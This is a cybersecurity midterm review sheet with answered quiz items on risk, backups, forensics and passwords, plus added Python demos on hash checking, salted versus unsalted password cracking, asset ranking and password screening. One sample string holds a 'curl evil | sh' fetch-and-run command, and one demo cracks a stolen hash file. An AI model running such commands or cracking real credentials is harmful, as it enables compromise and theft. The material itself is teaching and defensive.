Cybersecurity Midterm Review

What is the purpose of the SETA program?

A SETA program is a security control measure designed to increase employees' knowledge of security measures through education, training, and awareness activities.

Comparing the hash value of a file allows a security professional to:

a. Verify the authenticity of a file or application b. Report a defect to the software manufacturer c. Determine if the file is corrupt d. Respond to malware A (A matching digest proves only that the bytes are unchanged relative to the reference value; it vouches for authenticity only when that reference digest was itself obtained from a trusted, authenticated source.)
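
As an added example (not part of the original review sheet), the following Python script hashes a file in chunks, the way you would for a large download, and compares the result with a published digest using a constant-time comparison. The file contents and the "published" digest are constructed inline so the script runs offline.

```python
"""Verify a file against a published reference digest.

Added example (not from the review sheet). GOOD_BYTES, TAMPERED_BYTES and
PUBLISHED_SHA256 are constructed here so the script is self-contained.
"""
import hashlib
import hmac

# Constructed sample: the bytes a vendor shipped, and the SHA-256 they
# published for them (computed here rather than fetched).
GOOD_BYTES = b"#!/bin/sh\necho installing agent\n"
PUBLISHED_SHA256 = hashlib.sha256(GOOD_BYTES).hexdigest()

# Constructed sample: the same file after a tamper on the way to the user.
TAMPERED_BYTES = b"#!/bin/sh\necho installing agent; curl evil | sh\n"


def sha256_hex(data: bytes, chunk_size: int = 1 << 16) -> str:
    """Hash data in fixed-size chunks, as you would stream a large file from disk."""
    h = hashlib.sha256()
    for i in range(0, len(data), chunk_size):
        h.update(data[i:i + chunk_size])
    return h.hexdigest()


def verify(data: bytes, expected_hex: str) -> bool:
    """Return True only if the computed digest equals the expected one.

    hmac.compare_digest runs in constant time, so a caller exposed over a
    network cannot learn how many leading characters matched from timing.
    Case is normalised because vendors publish digests in either case.
    """
    actual = sha256_hex(data)
    return hmac.compare_digest(actual.lower(), expected_hex.strip().lower())


if __name__ == "__main__":
    print("original :", verify(GOOD_BYTES, PUBLISHED_SHA256))      # True
    print("tampered :", verify(TAMPERED_BYTES, PUBLISHED_SHA256))  # False
```

In practice the reference digest must come from somewhere the attacker cannot rewrite along with the file (a signed manifest, or a page served from a different origin than the download); a digest sitting next to the file on the same compromised mirror proves nothing.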

The ______ hijacking attack uses IP spoofing to enable an attacker to impersonate another entity on the network.

a. WWW b. FTP c. HTTP d. TCP D

The storage of duplicate online transaction data, along with the duplication of the databases, at a remote site on a redundant server is called _____.

a. application recovering b. database shadowing c. remote journaling d. electronic vaulting B

​A long-term interruption (outage) in electrical power availability is known as a(n) ______.

a. brownout b. sag c. fault d. blackout D

In early 2014, in response to Executive Order 13636, NIST published the Cybersecurity Framework, which intends to allow organizations to _____.

a. communicate among local, state, and national agencies about cybersecurity risk b. identify and prioritize opportunities for improvement within the context of a continuous and repeatable process c. None of these d. assess progress toward a recommended target state B

Which of the following is a valid type of role when it comes to data ownership?

a. data owners b. data users c. data custodians d. all of the above D

Digital forensics involves the _____, identification, extraction, documentation, and interpretation of digital media.

a. determination b. confiscation c. preservation d. investigation C

A table of hash values and their corresponding plaintext values that can be used to look up password values if an attacker is able to steal a system's encrypted password file is known as a(n) ______.

a. dictionary b. rainbow table c. crib d. crack file B
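
An added example, not from the review sheet, of why the lookup described above works and what defeats it: it builds a hash-to-plaintext table for a constructed wordlist and runs it against a constructed stolen password file, first stored unsalted and then with a per-user random salt. (A real rainbow table stores hash/reduce chains to save space; the simpler full lookup table here shows the same principle.) The wordlist, user names and passwords are all constructed.

```python
"""Precomputed hash -> plaintext lookup against unsalted and salted password stores.

Added example (not from the review sheet). WORDLIST, PASSWORDS and the two
"stolen" files are constructed inline.
"""
import hashlib
import os

# Constructed wordlist standing in for a real cracking dictionary.
WORDLIST = ["password", "letmein", "qwerty", "summer2024", "admin123"]


def pw_hash(password: str, salt: bytes = b"") -> str:
    """SHA-256 of salt || password; salt=b"" models an unsalted store."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def build_table(wordlist, salt: bytes = b"") -> dict:
    """Precompute digest -> plaintext for every candidate under one salt."""
    return {pw_hash(w, salt): w for w in wordlist}


def lookup(stolen: dict, table: dict) -> dict:
    """Recover the plaintext of every user whose digest appears in the table."""
    return {user: table[digest] for user, digest in stolen.items() if digest in table}


def crack_unsalted(stolen: dict, wordlist) -> tuple:
    """One table, built once, serves every user and every future breach."""
    table = build_table(wordlist)
    return lookup(stolen, table), len(wordlist)


def crack_salted(stolen: dict, wordlist) -> tuple:
    """The table must be rebuilt per salt, so the work grows with the user count."""
    found, work = {}, 0
    for user, (salt, digest) in stolen.items():
        table = build_table(wordlist, salt)
        work += len(wordlist)
        if digest in table:
            found[user] = table[digest]
    return found, work


# Constructed stolen files: same two users and passwords, two storage designs.
PASSWORDS = {"alice": "letmein", "bob": "Tr0ub4dor&3"}
UNSALTED_FILE = {u: pw_hash(p) for u, p in PASSWORDS.items()}
SALTS = {u: os.urandom(16) for u in PASSWORDS}
SALTED_FILE = {u: (SALTS[u], pw_hash(p, SALTS[u])) for u, p in PASSWORDS.items()}

if __name__ == "__main__":
    print(crack_unsalted(UNSALTED_FILE, WORDLIST))  # ({'alice': 'letmein'}, 5)
    print(crack_salted(SALTED_FILE, WORDLIST))      # ({'alice': 'letmein'}, 10)
    # The generic, salt-free table recovers nothing from the salted file:
    print(lookup({u: d for u, (_, d) in SALTED_FILE.items()}, build_table(WORDLIST)))  # {}
```

The salt does not stop a targeted guess against one account (alice still falls to the wordlist), but it removes the attacker's ability to amortise one precomputed table over every account and every breach. Pairing the salt with a deliberately slow password hash (bcrypt, scrypt or Argon2) is what makes each of those per-user guesses expensive.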

A server would experience a(n) __________ attack when a hacker compromises it to acquire information via a remote location using a network connection.

a. direct b. indirect c. hardware d. software A

Flaws or weaknesses in an information asset, security procedure, design, or control that can be exploited accidentally or on purpose to breach security are known as _____.

a. events b. exploits. c. vulnerabilities d. threats C

A technique used to compromise a system is known as a(n) ___________.

a. exploit b. access method c. risk d. asset A

Data backup should be based on a(n) ____ policy that specifies how long log data should be maintained.

a. incident response b. business resumption c. replication d. retention D

The stated purpose of ISO/IEC 27002:2013 is to give guidelines for organizational information security standards and information security_____ practices.

a. management b. accreditation c. certification d. implementation A

The average amount of time until the next hardware failure is known as ______.

a. mean time between failure (MTBF) b. mean time to repair (MTTR) c. ​mean time to diagnose (MTTD) d. ​mean time to failure (MTTF) D

The actions taken by management to specify the intermediate goals and objectives of the organization are _____.

a. operational planning b. contingency planning c. strategic planning d. tactical planning D

Which of the following is NOT one of the categories recommended for categorizing information assets?

a. people b. hardware c. firmware d. software C

A(n) _____ is a document containing contact information for the people to be notified in the event of an incident.

a. phone list b. alert roster c. emergency notification system d. call registry B

The point in time before a disruption or system outage to which business process data can be recovered after an outage is ____.

a. recovery point objective (RPO) b. maximum tolerable downtime (MTD) c. work time recovery (WTR) d. recovery time objective (RTO) A

The first phase of the risk management process is _____.

a. risk identification b. risk evaluation c. forming the risk management team d. risk control A

The sworn testimony that certain facts are in the possession of an investigating officer and that they warrant the examination of specific items located at a specific place is called a(n) _____.

a. search warrant b. writ of habeas corpus c. affidavit d. sworn warrant C

The concept of competitive _____ refers to falling behind the competition.

a. shortcoming b. failure c. drawback d. disadvantage D

​The goals of information security governance include all but which of the following?

a. ​Strategic alignment of information security with business strategy to support organizational objectives b. Risk management by executing appropriate measures to manage and mitigate threats to information resources c. Regulatory compliance by using information security knowledge and infrastructure to support minimum standards of due care d. Performance measurement by measuring, monitoring, and reporting information security governance metrics to ensure that organizational objectives are achieved C

Most common data backup schemes involve ______.

a. RAID b. disk to disk to cloud c. neither d. both D

_____ of information is the quality or state of being genuine or original, rather than a reproduction or fabrication.

Authenticity

________ enables authorized users—people or computer systems—to access information without interference or obstruction and to receive it in the required format.

Availability

Describe residual risk.

Residual risk is the remaining risk after controls designed to mitigate risk have been implemented. The goal of risk management is not to bring risk levels to zero, but to bring the amount of residual risk in line with the organization's risk appetite.

Describe worms and viruses

Virus: code segments that attach to existing programs and take control of access to the targeted computer.
Worms: malicious programs that replicate themselves constantly, without needing a host program, until they completely fill available resources such as memory and hard drive space.

_____ is simply how often you expect a specific type of attack to occur in a given year.

a. CBA b. ALE c. ARO d. SLE C (annualized rate of occurrence; ALE = SLE × ARO)

The ______ is the individual primarily responsible for the assessment, management, and implementation of information security in the organization.

a. CISO b. CTO c. CIO d. ISO A

The _____is the high-level information security policy that sets the strategic direction, scope, and tone for all of an organization's security efforts.

a. GSP b. EISP c. SSySP d. ISSP B

In Windows 10/11, check all the options available within Windows Hello to authenticate to a device:

a. PIN b. security key c. face d. fingerprint e. picture

In Linux, from a terminal window, which command will list all the subfolders included in the current working folder?

a. pwd b. cat c. dir d. rmdir C (Linux commands are case-sensitive and lowercase; dir lists every entry in the current directory, files as well as subfolders, and ls is the command normally used for this.)

The redirection of legitimate user Web traffic to illegitimate Web sites with the intent to collect personal information is known as ______.

a. spoofing b. sniffing c. phishing d. pharming D

A computer is the __________ of an attack when it is used to conduct an attack against another computer.

a. target b. subject c. facilitator d. object B

In a _____, assets or threats can be prioritized by identifying criteria with differing levels of importance, assigning a score for each of the criteria, and then summing and ranking those scores.

a. threat assessment b. weight table analysis c. risk management program d. data classification scheme B
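
The weighted table analysis described above, as an added example in Python (the criteria, weights, assets and scores are constructed for illustration and are not taken from the review sheet):

```python
"""Weighted table (weighted factor) analysis for ranking information assets.

Added example (not from the review sheet). WEIGHTS and ASSET_SCORES are
constructed illustrations.
"""

# Criteria and their relative importance; the weights must sum to 1.0.
WEIGHTS = {
    "impact_to_revenue": 0.30,
    "impact_to_profitability": 0.40,
    "impact_to_public_image": 0.30,
}

# Constructed scores from 0.0 (no impact) to 1.0 (maximum impact), per asset per criterion.
ASSET_SCORES = {
    "Customer order database": {"impact_to_revenue": 0.9, "impact_to_profitability": 0.9, "impact_to_public_image": 0.5},
    "Public web server":       {"impact_to_revenue": 0.6, "impact_to_profitability": 0.5, "impact_to_public_image": 0.9},
    "Payroll system":          {"impact_to_revenue": 0.2, "impact_to_profitability": 0.8, "impact_to_public_image": 0.7},
    "Internal wiki":           {"impact_to_revenue": 0.1, "impact_to_profitability": 0.2, "impact_to_public_image": 0.3},
}


def validate_weights(weights: dict, tol: float = 1e-9) -> None:
    """Weights that do not sum to 1 silently distort every ranking; fail loudly instead."""
    total = sum(weights.values())
    if abs(total - 1.0) > tol:
        raise ValueError(f"criteria weights sum to {total:.3f}, expected 1.0")
    if any(w < 0 for w in weights.values()):
        raise ValueError("criteria weights must be non-negative")


def weighted_score(scores: dict, weights: dict) -> float:
    """Sum of score x weight over every criterion; an unscored criterion is an error, not a zero."""
    missing = set(weights) - set(scores)
    if missing:
        raise KeyError(f"asset not scored on {sorted(missing)}")
    for criterion, score in scores.items():
        if not 0.0 <= score <= 1.0:
            raise ValueError(f"score {score} for {criterion} is outside 0..1")
    return round(sum(scores[c] * weights[c] for c in weights), 3)


def rank_assets(asset_scores: dict, weights: dict) -> list:
    """Return [(asset, weighted_score), ...] ordered from most to least valuable."""
    validate_weights(weights)
    ranked = [(asset, weighted_score(scores, weights)) for asset, scores in asset_scores.items()]
    return sorted(ranked, key=lambda pair: pair[1], reverse=True)


if __name__ == "__main__":
    for asset, score in rank_assets(ASSET_SCORES, WEIGHTS):
        print(f"{score:.2f}  {asset}")
```

The same routine ranks threats instead of assets by swapping in threat names and criteria such as likelihood and expected damage; only the two dictionaries change.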

In Linux, from a terminal window, what special character added to the end of an application name will launch that application in the background?

ampersand &

Disaster _____ is the process of examining an adverse event or incident and determining whether it constitutes an actual disaster.

classification

E-mail spoofing involves sending an e-mail message with a harmful attachment.

false

The bottom-up approach to information security has a higher probability of success than the top-down approach.

false

Within a data classification scheme, "comprehensive" means that an information asset should fit in only one category.

false (fitting in only one category is the "mutually exclusive" requirement; "comprehensive" means every asset fits in some category)

You cannot use qualitative measures to rank information asset values.

false

​An attack, breach of policy, or other incident always constitutes a violation of law, requiring notification of law enforcement.

false

The _____ treatment strategy attempts to reduce the impact caused by the exploitation of vulnerability through planning and preparation.

mitigation

A(n) _____ directs members of an organization as to how issues should be addressed and how technologies should be used.

policy

After identifying and performing the preliminary classification of an organization's information assets, the analysis phase moves on to an examination of the _____ facing the organization.

threats

Evidentiary material is any information that could potentially support an organization's legal or policy-based case against a suspect.

true

Much human error or failure can be prevented with effective training and ongoing awareness activities.

true

Organizations can use dictionaries to regulate password selection during the reset process and thus guard against easy-to-guess passwords.

true
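
An added example, not from the review sheet, of a dictionary-based password screen: it normalises the candidate (lower-case, common character substitutions undone, leading and trailing digits or punctuation stripped) before comparing it with the dictionary, so "P@ssw0rd2024!" is rejected as a variant of "password". The dictionary is a constructed stand-in for a real wordlist file.

```python
"""Dictionary-based password screening with normalisation.

Added example (not from the review sheet). DICTIONARY is a constructed
stand-in for a real wordlist.
"""
import re

DICTIONARY = {"password", "welcome", "letmein", "qwerty", "dragon", "summer", "monkey"}

# Substitutions people use to disguise a dictionary word; undone before lookup.
LEET = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "i", "!": "i",
                      "0": "o", "$": "s", "5": "s", "7": "t"})

MIN_LENGTH = 12
REASON_SHORT = f"shorter than {MIN_LENGTH} characters"
REASON_DICT = "based on a dictionary word"


def normalize_variants(candidate: str) -> set:
    """Return the word stems a candidate could be hiding.

    Stripping leading/trailing digits and punctuation both before and after
    undoing substitutions catches 'Password2024!' as well as 'P@ssw0rd1',
    where the trailing '1' would otherwise be turned into an 'i'.
    """
    def strip(s: str) -> str:
        return re.sub(r"^[^a-z]+|[^a-z]+$", "", s)

    low = candidate.lower()
    return {
        low,
        strip(low),
        low.translate(LEET),
        strip(low).translate(LEET),
        strip(low.translate(LEET)),
    }


def is_dictionary_based(candidate: str, dictionary=DICTIONARY) -> bool:
    return any(variant in dictionary for variant in normalize_variants(candidate))


def check_password(candidate: str, dictionary=DICTIONARY) -> list:
    """Return the reasons a proposed password is rejected; an empty list means accepted."""
    reasons = []
    if len(candidate) < MIN_LENGTH:
        reasons.append(REASON_SHORT)
    if is_dictionary_based(candidate, dictionary):
        reasons.append(REASON_DICT)
    return reasons


if __name__ == "__main__":
    for pw in ("P@ssw0rd2024!", "Dragon1", "correct-horse-battery-staple"):
        print(pw, "->", check_password(pw) or "accepted")
```

The check only matches whole stems, so "dragonfly" passes while "Dragon1" does not; a stricter policy can additionally reject candidates that contain a dictionary word, at the cost of more false rejections. Apply the check at reset time, before the new password is hashed and stored.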

To achieve defense in depth, an organization must establish multiple layers of security controls and safeguards.

true

